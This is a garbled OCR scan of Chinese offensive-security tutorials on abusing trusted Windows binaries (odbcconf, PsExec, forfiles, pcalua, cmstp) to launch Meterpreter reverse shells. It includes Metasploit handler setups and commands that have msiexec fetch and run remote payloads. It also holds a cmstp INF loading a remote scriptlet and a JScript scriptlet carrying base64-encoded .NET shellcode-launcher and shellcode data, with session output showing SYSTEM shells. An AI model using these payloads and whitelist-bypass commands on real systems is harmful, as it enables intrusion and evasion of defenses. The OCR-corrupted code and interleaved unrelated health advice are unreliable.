"ZmlhYmx1Q29kZUFOdHJpYnVOZQAAAAAAAyAAAAAAAPBdGg231uNOusKVWQeLbsD4ACLd6XF YZNOC J + 
" AyAAAQMAAAECBgkKHAAQICQK ICQOABhg JCQkYCRAJBQACCRg JBSABARENBCABAQgEAQAAAAMGERAH "+ | 
" AAIBELKRLQQAARGKCAAEAROFCBg IAgYYCACFHQUJGAkKYBCABAQ4 TAQATAAAAAAACAQABAFQCF 1 dy " + 

"YXBOb25FeGNICHRpb25UaHJvd3MBgJ4uAYCEU31zdGVtL1NlYS3VyaXRSLl1Blcmipc3Npb25zLlNl"- 

"Y3VyaXRSUGVybwlzc21vbkFOdHJpYnVOZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wL jAuMCwgQ3Vs "-- 


"dHVyZTiuZXVOcmFsLCBQdWJsaWNLZX1Ub2tlbj1iNzdhNWM1NjESMZRIMDg5FQFUAhBTa2 lwVmV y" + 
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" aWZpY2FOaW9uAQAAAOgpAAAAAAAAAAAAAP ADAAAAI AAAAAAAAAAAAAAAAAAAAAAAAAAAAADWKQAA " + 
"AAAAAAAAXONVCKRSbE1hawA4AbXN j b3 J1ZS5k bGWAAAAAAP8 TACAAEAAAAAAAAAAAAAAAAAAAAAAA " + 


"АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 


"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "+ 





"ДААААААААААААААААААААААААААААААДАААААААААААААААААААААААААААААААААААААААААААА" + 
"ДААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 
"ДААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 
"ДААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 
"ДААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAGAAAAAAAAAAAAAAAAAAA" + 
"AQABAAAAMAAAGAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAABOAgAAAAAAAAAAAABOA j QAAABW" + 
"AFMAXWwBWAEUAUGBTAEKATWBOAF8ASQBOAEYATWAAAAAAVQT V / GAAAQAAAAAAAAAAAAAAAAAAAAAA" + 
"PHAAAAAAAAAEAAAAAGAAAAAAAAAAAAAAAAAAAEQAAAABAF YAYQByAE YAaQBSAGUASQBUAGYADWAA" + 
"AAAAJAAEAAAAVAByAGEAbgBZAGWAYQBOAGkAbwBUAAAAAAAAALAE1AEAAAEAUWBOAHIAaQBUAGCA" + 
"RgBpAGwWAZQBJAGA4AZgBVAAAASAEAAAEAMAAVADAAMAAWADQA Y gAWAAAAL AACAAEARGBpAGWAZQBE "+ 
"AGUACWBj AHIAaQBWwAHQAaQBVAGAAAAAAACAAAAAWAAgAAQBGAGKADAB1AFYAZQByAHMAaQBVAGAA" + 
"AAAAADAAL gAWAC4AMAAUADAAAABQABCAAQBJAG4AGAB1AHIADgBhAGWATgBhAGOAZQAAAHCAbQBp" + 
"AF BAYWBZAF 8AZABSAGWAXWBWAGEAe QBSAGBAY QBKAC4AZABSAGWAAAAAACGAAGABAEWAZQBNAGEA" + 
"bABDAGBACABSAHIAaQBnAGgAdAAAACAAAABYABCAAQBPAHIAaQBnAGkAbgBhAGWARgBpAGWAZQBU'" + 


"AGEAbQBIAAAAdwBtAGKkAXwB | AHMAXWBKAGWADABf AHAAYQBSAGwAbWBhAGQAL gBKAGWADAAAAAAA " + 


| "NAAIAAEAUAByAGBAZAB1AGMAdABWAGUACQBZAGKAbwWBUAAAAMAAUADAALgAWACAAMAAAADGACAAB "+ 





"AEEACWBZAGUAbQBiAGWAeQAgAFYAZQByAHMAaQBVvAGAAAAAWACAAMAAUADAALGAWAAAAAAAAAAAA + 


® "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANAAAAAAAAAAAAAAAAAA" + 
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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT 4 


"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + 


"AAAAAAAAAAAAAAAAAAAAAAAATAAADAAAABAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA AAA + 





AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 


"АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА"+ 


"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 


"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 


"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA " + 


UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + 


"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 


"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'!'+ 


"AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAKXAAAACQYAAAA JFgAAAAYaAAAAJ1N5c3R1bS5SZWZS' + 


"ZwNQaW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCWAA"; 


var entry class = 'ShellCodeLauncher.Program'; 


try { 
setversion(); 


var stm 


base64ToStream(serialized obj); 

var fmt - new ActiveXObject('System.Runtime.Serialization.Formatters.Binary. 
var al = new ActiveXObject('System.Collections.ArrayList'); 

var d - fmt.Deserialize 2(stm); 


al.Add(undefined); 
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з catch (e) { 


debug(e.message); 
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基于 白 名 单 odbcconf 执 行 payload 第 十 二 季 


Ж: 请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结 石 ， 通 风 等 。 
痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 紊乱 等 多 种 代谢 性 疾病 。 
Odbcconf 简 介 : 

ODBCCONF.exe 是 一 个 命令 行 工 具 ， 人 允许 配置 ODBC 驱 动 程序 和 数据 源 。 


微软 官方 文档 : 





说 明 : Odbcconf.exe 所 在 路 径 已 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，Odbcconf 命 令 可 识别 ， 需 注 
意 x86，x64 位 的 Odbcconf 调 用 。 


Windows 2003 默认 位 置 : 


C:\WINDOWS\system32\0dbcconf .exe 


C: NINDOWSNSysWOW64Nodbcconf . exe 


Windows 7 默认 位 置 : 


C:NWindowsNSystem32Nodbcconf.exe 


C:NWindowsNSyswOW64Nodbcconf.exe 


攻击 机 : 192.168.1.4 &Debian 

靶 机 : 192.168.1.119&Windows 2003 
192.168.1.5& Windows 7 

配置 攻击 机 msf: 


注 : x86 payload 
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—— 1 


exploit(multi/handler) » show options 
odule options (exploit/multi/handler): 
_ Name Current Setting Required Description 


load options (windows/meterpreter/reverse tcp): 


. Name Current Setting Required Description 





2 EXITFUNC process yes 
LHOST 192.168.1.4 yes 


LPORT 53 yes 


Wildcard Target 


Exit technique (Accepted: '', seh, three 


The listen address (an interface may be 


The listen port 
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msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


exploit (mul Еі һап ег) > show options 


Module options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Required 


EXITFUNC D ccepted: seh, thread, process, none) 


LHOS 4 The listen address {ап intertace may be specified) 
LPORT ; yes The listen por 
Explait target: 
Id Name 
0 Wildcard Target 
exploit(multi handler) > exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 





靶 机 执行 : Windows 2003 


Жж: 文中 为 了 更 好 的 跨 Windows 03--Windows 2016, Odbcconf for dl 来 纯 C 重 新 编写 。 
Z| x 





高 级 | 自动 更 新 | 远程 | 


系统 : 
Microsoft Windows Server 2003 R2 
Enterprise x64 Edition 


Service Pack 2 





注册 到 : 


C:NWindowsNSysWOW64Nodbcconf.exe /a {regsvr C:MMicropoor Odbcconf.dll) 


+: x64 Odbcconf.exe 
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mot e ploit( ult 


+] Started reverse 
+] Sending st: 
] Meterpreter 74 opened (192.16 -> 192.168.1.119:1187) at 20 


| 
| 
[ 





Micropoor_Odbcconf.dll， 已 测 Windows 2003 x64 Windows 7 x64 
Ж: 


功能 : reverse tcp IP:192.168.1.4 PORT53。 如 有 安全 软件 拦截 ， 因 Micropoor 加 入 特征 。 


pulv 73216 字 节 

修改 时 间 : 20195E1H19H, 21:29:11 

MD5: B31B971F01DE32EC5EC45746BF3DDAD2 

5НА1: CF42E4BF5A613992B7A563A522BBEBF1DOFO6CCE 


CRC32: 28А1СЕ90 
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基于 白 名 单 PsExec 执 行 payload 第 十 三 季 


Ж: 请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结 石 ， 通 风 等 。 
痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 亲 乱 等 多 种 代谢 性 疾病 。 


PsExec 简 介 : 





微软 于 2006 年 7 月 收购 sysinternals 公 司 ，PsExec 是 SysinternalsSuite 的 小 工具 之 一 ， 是 一 种 轻 量 级 
的 teinet 替 代 品 ， 允 许 在 其 他 系统 上 执行 进程 ， 完 成 控制 台 应 用 程序 的 完全 交互 ， 而 无 需 手动 安装 客 
户 端 软件 ， 并 且 可 以 获得 与 控制 台 应 用 程序 相当 的 完全 交互 性 。 


微软 官方 文档 : 


说 明 : PsExec.exe 没 有 默认 安装 在 windows 系 统 。 
攻击 机 : 192.168.1.4 &Debian 
ШЛ: 192.168.1.119&Windows 2003 


配置 攻击 机 msf: 
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i * s 1 


EXITFUNC process yes 


LHOST 192.168.1.4 yes 


LPORT 53 yes 


Exploit target: 


Id Name 


9 wildcard Target 


msf exploit(multi/handler) > show options 


_ Module options (exploit/multi/handler): 


op К. же 7% > 


Name Current Setting Required Description 


Exit technique (Accepted: '', seh, three 


The listen address (an interface may be 


The listen port 
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msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


mst exploit(rultishandler) > show options 


Module options (exploit/multivhandler) 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse tcp) 
Name 
jo? seh, thread, proc , none) 
The listen address (an interface may be specifi 
The listen port 
Exploit target 
Id Name 


© wildcard 


msf exploitinulti ha ә) > exploit 


[*] Started reverse TCP handler on 192. 





Microsoft Windows Server 2003 R2 


Enterprise x64 Edition 


E:\SysinternalsSuite >PsExec.exe -d ~s msiexec.exe /q Zi http://192.168.1.4/Micro 
poor. reu. x86 msi 53.txt 


PsExec v2.2 - Execute processes remotely 
Copyright <C>) 20801-2016 Mark Russinovich 
Sysinternals — wuu.sysinternals.conm 





msicxec.exe, started on WIN@3X64 with process ID 992. 





1867 


msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 
E*] Sending stage (179779 bytes) to 192.168.1.119 


[*] Meterpreter session 11 opened (192.168.1.4:53 -» 192.168.1.119:1318) at 201€ 


meterpreter » getuid 

Server username: NT AUTHORITY\SYSTEM 
meterpreter » getpid 

Current pid: 728 


meterpreter » 


ist exploit{eutti ler) > exploit 


Started reverse TCP handler оп 
Sending staqe (179779 byte 
Meterpreter : j .1.4:53 -» 192.168.1.119:1318) at 2019-01-20 05:43:32 -0500 


'er username 


Current pid: ) 
meterpreter | 
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ЕЛНЕ 单 Forfiles 执 行 payload 第 十 四 季 


+: 请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结 石 ， 通 风 等 。 
痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 紊乱 等 多 种 代谢 性 疾病 。 
Forfiles 简 介 : 


Forfiles 为 Windows 默 认 安装 的 文件 操作 搜索 工具 之 一 ， 可 根据 日 期 ， 后 缀 名 ， 修 改 日 期 为 条 件 。 常 
与 批 处 理 配合 使 用 。 


微软 官方 文档 : 





说 明 : Forfiles.exe 所 在 路 径 已 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，Forfiles 命 令 可 识别 ， 需 注意 | 
x86，x64 位 的 Forfiles 调 用 。 


Windows 2003 默认 位 置 : 


C: NWINDOWSNsystem32Nforfiles.exe 


C: \WINDOWS\Syswow64\forfiles.exe 


Windows 7 默认 位 置 : 


C:\WINDOWS\system32\forfiles.exe 


C: \WINDOWS\Syswow64\forfiles.exe 


攻击 机 : 192.168.1.4 &Debian 
SEE): 192.168.1.119&Windows 2003 


配置 攻击 机 msf: 
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— . ГС, > 


options (windows/meterpreter/reverse_tcp): 


Current Setting Required Description 






EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.4 yes The listen address (an interface may be 


LPORT 53 yes The listen port 


. Exploit target: 


0 Wildcard Target 
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msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


msf exploit(multi handler) > show options 


Module options (exploit/multi/handler): 


Name Current Setting Required Description 


ad options (windows/meterpreter/reverse tcp) 
Name Description 
ITFUNC 0 yes Ex1t technique (Accepted seh, thread, proc 
The listen address (an interface may be specifie 
The listen port 
Exploit target 
Id Name 


9 Wildcard Target 


msf explpit(multi har dier) > exploit 


[*] Started reverse TCP handler on 192.168.1,4:53 





靶 机 执行 : Windows 2003 


Le pora joan р ewm. i 


系统 : 
Microsoft Windows Server 2003 R2 
+ Enterprise x64 Edition 
) Service Pack 2 


注册 到 : 
forfiles /p c: NindowsNsystem32 /m cmd.exe /c "msiexec.exe /q /i http://192.168. 


IE: \>forfiles np с: \windows \system32 ¿Zm cmd.exe Zc "ms iexec .exe 24 Zi http://192. 
168.1.4/Micropoor reu x86 msi 53.txt" à 





msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


[*1 Sending stage (179779 bytes) to 192.168.1.119 


[*] Meterpreter session 15 opened (192.168.1.4:53 -> 192.168.1.119:1331) at 201€ 


meterpreter » getuid 


Server username: WINO3X64\Administrator 


meterpreter » getpid 


Current pid: 392 


meterpreter » 


msf exploit(mul 


| 
І 
| 


-> 192.168.1.119:1331) at 2019-01-20 06:34:08 -0500 
» getuid 


: WI 
pi d 


meterpreter > 
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基于 白 名 单 Pcalua 执 行 payload 第 十 五 季 


Ж: 请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结石 ， 通 风 等 。 

痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 闪 乱 等 多 种 代谢 性 疾病 。 

Pcalua 简 介 : 

Windows 进 程 兼容 性 助理 (Program Compatibility Assistant) 的 一 个 组 件 。 

说 明 : Pcalua.exe 所 在 路 径 已 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，Pcalua 命 令 可 识别 


Windows 7 默认 位 置 : 


C: NindowsNSystem32Npcalua.exe 


攻击 机 ; 192.168.1.4 &Debian 
ШЛ: 192.168.1.5&Windows 7 


配置 攻击 机 msf: 
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b 


Name 
EXITFUNC 
LHOST 


LPORT 


ote evento ta ERE SER 


sov me at dnas 


< 


exploit(multi/handler) > show options 
lodule options (exploit/multi/handler): 
3 Name Current Setting Required Description 


P yload options (windows/meterpreter/reverse tcp): 


Current Setting Required Description 


process yes 
192.168.1.4 yes 
53 yes 


Exploit target: 


© Wildcard Target 


Exit technique (Accepted: '', seh, three 
The listen address (an interface may be 


The listen port 
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msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


sf exploit(multi handler) > show options 


Module options (exploit/multi, 


leterpreter/reverse_tcp) 


Current Setting Required Description 


proce yes Exit technique {А ed seh, thread 


192.168.1.4 The listen address (ап interface may be spe 


LPORT 53 \ The listen port 


Exploit target: 
Id Name 


0 Wildcard Target 


msf exploit(rulti handler) > exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


靶 机 执行 : 


Pcalua -m -a NN192.168.1.119NshareNrev x86 53 exe.exe 


C:NUsersVXJohn»Pcalua -m -a \\192.168.1.119\share\rev_«86 


none) 
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msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 
[*] Sending stage (179779 bytes) to 192.168.1.5 


[*] Meterpreter session 23 opened (192.168.1.4:53 -» 192.168.1.5:11349) at 2019- 


meterpreter » getuid 

Server username: John-PC\John 
meterpreter > getpid 

Current pid: 11236 


meterpreter > 


nsf exploit (пи гапа ег) 


[°] Started reverse TCP 
[+] Sending stage (12 
[+] 


Meterpreter sion 23 0 ',16 4: 3 -> 192.168.1.5:11349) at 2019-01-20 09:25:01 -0500 


> getuid 
: John-PCXJohn 
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基于 白 名 单 Cmstp.exe 执 行 payload 第 十 六 季 | 


+: 请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结 石 ， 通 风 等 。 
痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 闪 乱 等 多 种 代谢 性 疾病 。 
Cmstp 简 介 : 


Cmstp 安 装 或 删除 “连接 管理 器 "服务 配置 文件 。 如 果 不 含 可 选 参数 的 情况 下 使 用 ， 则 cmstp 会 使 用 
对 应 于 操作 系统 和 用 户 的 权限 的 默认 设置 来 安装 服务 配置 文件 。 


微软 官方 文档 : 


说 明 : Cmstp.exe 所 在 路 径 已 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，Cmstp 命 令 可 识别 ， 需 注意 
x86，x64 位 的 Cmstp 调 用 。 


Windows 2003 默认 位 置 : 


C:\Windows\System32\cmstp.exe 


C: \Windows\SyswOW64\cmstp.exe 


Windows 7 默认 位 置 : 


C:\Windows\System32\cmstp.exe 


C: \Windows\SysWOW64\cmstp.exe 


攻击 机 : 192.168.1.4 &Debian 
ЯШ: 192.168.1.119& Windows 7 
配置 攻击 机 msf: 


it: x64 payload 
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Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.4 yes The listen address (an interface may be 
LPORT 53 yes The listen port 


Exploit target: 


© Wildcard Target 
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emsf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


msf exploit(rulti handler) » show options 


Module options (exploit/multi/handler) 


Name Current Setting Required Description 


Payload options (windows /x64/meterpreter/reverse_ tcp) 


Name Curre ttir Required 





seh, thread, process, none) 
specified) 


Exploit target 


Id Name 


© Wildcard Target 


[*] Started reverse TCP handler оп 192.168 





靶 机 执行 : 


cmstp.exe /ni /5 C:\Users\John\Desktop\rev.inf 


ohn\Desktop>cmstp. fs Cr\Users\Jo sktop\rev.int 


ohn\Desk 





2%: x64 payload 
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msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 
ІСІ Sending stage (206403 bytes) to 192.168.1.5 


ІЗІ Meterpreter session 9 opened (192.168.1.4:53 -> 192.168.1.5:13220) at 2019-C 


meterpreter » getuid 

Server username: John-PC\John 
meterpreter » getpid 

Current pid: 8632 


meterpreter » 


> exploit 


Sending $ 


Meterpreter s 9 opened (19 8.1.4:53 -» 192.168.1.5: ) 4 1 ? -0500 


an-PC\ John 





附录 : 


Micropoor rev cmstp inf: 
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[version] 
Signature=$chicago$ 


AdvancedINF=2.5 


[DefaultInstall SingleUser] 


UnRegisterOCXs-UnRegisterOCXSection 


[UnRegisterOCXSection] 


96119: Nscrobj.dll,NI,http://192.168.1.4/cmstp rev 53 x64.sct 


[Strings] 
AppAct - "SOFTWAREMMicrosoftNConnection Manager" 
ServiceName-"Micropoor" 


ShortSvcName="Micropoor" 


cmstp rev 53 x64.sct 
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<?XML versionz"1.0"?» 
» <scriptlet> 

| «registration 
progid="PoC" 


classidz"(F0001111-0000-0000-0000-0000FEEDACDC)" > 


<script language="JScript"> 


<! [CDATA[ 
function setversion() { 


function debug(s) {} 

function base64ToStream(b) { 

var enc = new ActivexObject("System. Text .ASCIIEncoding"); 

var length = enc.GetByteCount_2(b); 

var ba = enc.GetBytes 4(b); 

var transform - new ActiveXObject("System.Security.Cryptography.FromBase64Tr 
ba - transform.TransformFinalBlock(ba, 0, length); 

var ms = new ActiveXObject("System.IO.MemoryStream"); 

ms.Write(ba, 0, (length / 4) * 3); 

ms.Position - 0; 


. return ms; 
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var serialized obj - "EAR AE бекон 3 
"AwAAAAhEZWX1Z2FO0ZQdOYXJnZXQwB211dGhvZDADAwMwU31zdGVt LkR1bGVnYXR1U2VyawFsaXph"+ 
"dGlvbkhvbGRlcitEZWXlZ2FOZUVudHJ5IlNB5C3RlbSBSEZWX1Z2F0ZVNlcmlhbGl6YXRpb251b2xK'".. 
"ZXIvU31zdGVtL1JlZmxlY3Rpb24uTWVtYmVySwWSmbiNlcmlhbGle6YXRpb25Ib2xkZXIJAgAAAAKD' + 
"AAAACQQAAAAEAgAAADBTeXNOZWOURGVSsZWdhdGVTZXJ pYWxpemFOaW9uS69 sZGVyKOR1bGVnYXR1'. 
"RW58cnkHAAAABHR5CGUIYXNzZW1ibHkGdGFyZ2VOEnRhcmdldFRS5cGVBC3NlbWJseQ50YXJnZXRU' 
"eXxBlTmFtZQptZXRob2ROYW11DWRlbGVnYXRlRW50cnkBAQIBAQEDMFNSC3R1DSSEZWXx1Z22F0ZVN1 "+ 
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZwdhdGVFbnRyeQYFAAAAL1N5cC3RlIbS5SdW50aW1lLlJlbw90"- 
"aw5nLki1lc3NhZ2luZyBIZWFkZXJIYW5kbGVyBgYAAABLDXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"- 
"MCwgQ3VsdHVyZTi1uZXVOcmFsLCBQdWJsaWNLZX1Ub2tlbjiiNzdhNWMi1NjESMzRIMDg5BgcAAAAH" + 
"dGFyZ2VOMAkGAAAABgKAAAAPU31zdGVtLkRlibGVnYXRIBgoAAAANRHluYWipYOludm9rZQoEAwAA'" + 
"ACJTeXNOZWOUuRGVsZWdhdGVTZXJpYWxpemFOaW9uSG9sZGVyAwAAAAhEZWXx1Z2FO0ZQd0YXJnZXQw"' + 
"B211dGhvZDADBwMwU31zdGVtLkRlbGVnYXR1U2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVU"'- 
"dHJ5Ai9TeXNOZWOuUmVmbGV;j dGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA" + 
"CQWAAAAJDQAAAAQEAAAAL1N5C3R1bSSSZWZSsZWNOaW9uLk11bWJlckluzm9TZXJpYWxpemFOaW9u"* 
"SG9sZGVyBgAAAAROYW1 1DEFzc2Vt Ymx5TmFtZQlDbGFzcO5hbWUJU21nbmFOdXJlCk1lbWJlclR5"-* 
"CGUQR2VUuZXJpYOFyZ3VtZW5OCwEBAQEAAWgNU31zdGVtL 1R5cGVbXQKKAAAACQYAAAA JCQAAAAYR" + 
"AAAALFNSC3RIbSSPYmp1Y3QgRHluYWipYOludm9rzShTeXNOZWOUuT2 JqZWNOW10pCAAAAAOBCWAA" + \ 
"AAIAAAAGEgAAACBT eXNOZWOUWG1 sL1Nj aGVt YS5YbWxWYWx1ZUdldHRlcgYTAAAATVNSCSRIbSS5Y"* 

"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZTi1uZXVOcmF sLCBQdWJsaWNLZX1Ub2tlbjiiNzdh"-* 

"NWM1NjESMzRIMDg5BhQAAAAHdGFyZ2VOMAKkGAAAABhYAAAAaU31zdGVtL1J1lZmx1lv3Rpb24uQXNZ" * 

"ZWiibHKGFWAAAARMb2FKCg8MAAAAABIAAA JNWpAAAWAAAAQAAAD/ / WAAUAAAAAAAAABAAAAAAAAA" + 

" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh- 6DgCOCcOhuAFMzSFUaG 1z IHByb2dy "-* 


"YwOgY2Fubm90IGJlIHJibiBpbiBETiMgbW9kZS4NDQokAAAAAAAAAF BFAABKkhgIAYaVEXAAAAAAA"" + 
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" AAAABAAiIASCCWAADAAAAAQAAAAAAAAAAAAAACAAAAAAATABAAAAACAAARACAAAEAAAAAAAAAAQA" + 


"AAAAAAAAAGAAAAACAAAAAAAAAWBAh QAAQAAAAAAAAEAAAAAAAAAAABAAAAAAAAAgAAAAAAAAAAAA "+ 


"ABAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA JGCAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAA + 





"AAAAACAAAEgAAAAAAAAAAAAAACS0ZXhOAAAATAOAAAAgAAAADAAAAATAAAAAAAAAAAAAAAAAACAA " + 
"AGAucnNy YwAAAJgCAAAAQAAAAAQAAAAOAAAAAAAAAAAAAAAAAABAAABALn J1bG9 j АААААААААСАА" + 
"AAAAAAAAEgAAAAAAAAAAAAAAAAAAQAAAQKkgAAAACAAUA7 C LAAGAHAAABAAAAAAAAAAAAAAAAAAAA" + 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQg I OBAAACGAA" + 
"KAIAAAYAACOAAAAAAAAA / EDSPDOZAAAAEFRQVBSUVZIMdJISItSYEiLUhhliiIgSItyUEgPtOpK"- 
"TTHJSDHArDxhfAISsIEHByQ1BACHi 7VJBUUiLUiCLQjxIAdBmgXgYCWIPhXIAAACLgQIgAAABIhCBO"- 
"ZOgBOFCLSBhEiOAgSQHQ41ZI/81BizSISAHWTTHJSDHArEHByQ1BACE44HXXTANMJAhFOdF12FhE" + 
"jOAkSQHQZkGLDEhEiOAcSQHQQYsEiEgBOEFYQVheWVpBWEFZQVpIg-*wgQVL / AFhBWVplixLpS///"* 
"7/11 JvndzM18zMgAAQVZJieZIgeygAQAASYn1SbwCAAA1wKgBBEFUSYnkT InxQbpMdyYH/9VMiepo"+ 
"AQEAAF1BuimAawD/1WoKQVS5QUEOxyUOxwE j /wEi Jwk j /wEi JwUG66g/f4P/VSInHahBBWEyJ4kiJ"+ 
"+UG6maVOY f /VhcBOCkKn/znX16 JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtNIX//Vg/gAFIVIg8Qg"+ 
"Xon2akBBWWgAEAAAQVhIifJIMclBulikU*X/1UiJwO0mJx00xyUmJ8EiJ2kiJ-*UGGAtnIX//Vg/gA"- 
"fShYQVdZaABAAABBWGOAWKG6Cy8PMP /VV11BunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/ *dY" 4 
"agBZScfC8LwiVv/VAAATMAYAZQAAAAEAABEAIPABAACNBgAAASXQAWAABCgGAAAKChYG j m1 +AQAA" + 
"BHACAAAEKAMAAAYLBhYHbigHAAAKBOS5pKAgAAAOAf gkAAAOMF g1-- CQAAChMEFhYHEQQWEgMOBAAA" + 
"BgwIFSgFAAAGJisAKkOgABAAAIABAAAEHOCAAgAABCpCUOpCAQABAAAAAAAMAAAAd j QUMCA z MDMX "+ 
"OQAAAAAFAGWAAABGAGAAT 34AAMWCAABLAWAATANOCMLUZSMAAAAAFAY AAAgAAAA j VVMAHAY AABAA" + 
"AAAjR1VJRAAAACWGAAAOAQAAIO0JSb21AAAAAAAAAAGAAAVf VA j 0 JAgAAAPO LMWAWAAABAAAADWAA" + 
" AAQAAAADAAAABgAAAAWAAAALAAAABAAAAAEAAAABAAAAAQAAAAEAAAADAAAAAQAAAAEAAAABAAAA" + 


"AQAAAAAACGABAAAAAAAGADOANGAGAE OBMQEGAGKBMQEGA J gBeAEGAL gBeAEGANSBNgAGACUCeAEG" + 
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" AEACNGAGAHWCeAEGATSCNGAGAJECNGAGAL QCNgAGAOYCXxWIGAPGCXWIGACSDGWMAAAAAAQAAAAAA", 
"AQABAAEAEAATABSABQABAAEAAAAAAOABAAAF AAMABWAT AQAASg IAACEABAAHABEATWASABE AWgAS" + 
"ABMBaAI*AFAgAAAAAIYYRAAKAAEAaCIAAAAAKQBKAA4AAQAAAAAAgACRIHEAFQABAAAAAACAA JEG" 4- 
"fgAdAAUAAAAAAIAAKSCLACgACWDZIgAAAACRGBQDDgANAAAAAQCf AAAAAgC r AAAAAWCWAAAABADB" + 
"AAAAAQDLAAAAAgDeAAAAAWDGQAAAABADSAAAABQD / AAAABGAPAQAAAQAAAQAAAGATAREARAAUACEA" + 
"RAAOACKARAAKAAKARAAKADKARAAKAE kApAJCAGEAUWJKAGKA7 g JPAGEA8wJ YAHEARABKAHKARAAK" + 
"ACCAWWwASACAAEwBpACAAGwByAGMAKWASAAgABGCRAAEA/ gEAAAQAWWALAWABBWBXAAEAAAE JAH4A' + 
"AQAAAQSAiwABAGgQgGAAADAASAAAAAAAAAAAAAAAAAAAAAANYBAAAEAAAAAAAAAAAAAAABACOAAAAA " + 
"AAQAAWAAAAAB TWO Kk dWx LPgAyMj IyLmRsbABQcm9ncmF t AFNoZWxsQ29kZUxhdW5 j aGVyAG12zY29y" 
"bGliAFN5C3RIbQBPYmplY3QALmNOb3IATWFpbgBNRU1fQ909NTUIUAFBBROVfRVhFQ1VURV9SRUFE "+ 
